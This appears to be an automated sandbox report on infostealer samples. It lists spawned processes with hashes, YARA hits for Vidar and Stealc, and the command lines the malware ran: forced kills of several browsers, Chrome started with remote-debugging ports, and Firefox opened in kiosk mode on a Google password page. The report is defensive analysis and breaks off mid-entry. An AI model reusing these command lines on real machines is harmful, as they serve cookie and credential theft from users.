                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000002.3165203944.0000000000CD1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000003.2681589371.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                            • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                                                                            Start time:06:10:42
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                                                                                                                                                                            File size:1'925'632 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:77483DF5AA89C592975F97C5B06E3B90
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2845014489.0000000001A60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2846812600.0000000001A61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2809425016.0000000001A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2809635689.0000000001A60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2874285828.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2924471695.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2876379077.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.2924386969.0000000001A64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                                                                            Start time:06:10:43
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xb20000
                                                                                                                                                                                                                                                                                                            File size:921'600 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:000F6A67464F429EE855358DDADB9F3D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                            • Detection: 32%, ReversingLabs
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                                                                            Start time:06:10:44
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                                                                                            Start time:06:10:44
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                                                                            Start time:06:10:46
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                                                                            Start time:06:10:46
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                                                                            Start time:06:10:46
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                                                                            Start time:06:10:46
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                                                                            Start time:06:10:46
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                                                                            Start time:06:10:46
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                                                                            Start time:06:10:47
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                                                                            Start time:06:10:47
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                                                                            Start time:06:10:48
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                                                                            Start time:06:10:48
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                                                                            Start time:06:10:48
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                                                                            Start time:06:10:48
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                                                                            Start time:06:10:48
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2184,i,15586406889969502989,18205548253034486808,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                                                                            Start time:06:10:51
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2264 -prefMapHandle 2252 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b3756fb-4aa1-46df-9da2-bcc6763b1cc6} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" 18d64e69710 socket
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                                                                                            Start time:06:10:51
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                                                                                                                                                                            File size:1'800'704 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:EFBCCEEFF7FBBE424508E4DE00AD3CCD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000002.3255211624.0000000000CD1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000003.2827602995.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                                                                            Start time:06:10:51
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=2184,i,15586406889969502989,18205548253034486808,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                                                                            Start time:06:10:54
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7c0000
                                                                                                                                                                                                                                                                                                            File size:2'811'392 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:2F1C8416CEF3B59A907932142D732C06
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                            • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                                                                            Start time:06:10:55
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -parentBuildID 20230927232528 -prefsHandle 3536 -prefMapHandle 3496 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e1a0ebf-e3e0-4aec-9a10-549fec5c1c42} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" 18d76f36510 rdd
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                                                                            Start time:06:10:56
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                                                                            Start time:06:10:57
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2484,i,13421121324074571996,40061508320262685,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                                                                            Start time:06:10:59
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xb20000
                                                                                                                                                                                                                                                                                                            File size:921'600 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:000F6A67464F429EE855358DDADB9F3D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                                                                                            Start time:06:10:59
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
